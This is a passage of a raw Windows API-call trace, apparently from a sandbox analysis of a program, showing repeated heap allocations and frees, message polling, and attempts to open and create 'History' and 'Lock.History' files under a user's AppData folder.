0x24b1868 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0242.769] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0242.769] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0242.769] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0242.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0242.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0242.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0242.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0242.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0242.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0242.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0242.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0242.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0242.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x34b2250 [0242.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0242.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0242.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0242.770] GetLastError () returned 0x5 [0242.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0242.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0242.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0242.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0242.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0242.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0242.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.771] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0242.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0242.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0242.771] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0242.771] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0242.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0242.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0242.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0242.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0242.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0242.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0242.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0242.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0242.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0242.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x2416270 [0242.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.772] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local")) returned 0x2010 [0242.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0242.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0242.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x34b2250 [0242.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0242.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0242.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.history"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0242.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0242.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0242.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0242.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0242.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0242.774] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0242.774] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0242.774] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0242.774] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0242.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0242.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0242.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0242.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0242.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0242.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0242.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0242.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0242.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0242.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0242.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0242.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0242.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0242.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0242.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0242.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0242.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0242.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0242.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0242.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0242.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0242.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0242.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.776] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0242.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0242.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0242.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0242.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0242.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0242.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0242.777] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0242.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0242.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0242.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0242.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0242.777] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0242.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0242.778] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0242.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0242.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0242.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0242.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0242.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0242.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0242.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0242.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0242.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa00 [0242.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0242.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0242.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0242.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0242.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0242.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0242.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0242.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0242.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0242.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0242.780] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0242.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0242.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0242.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.781] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.781] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.781] 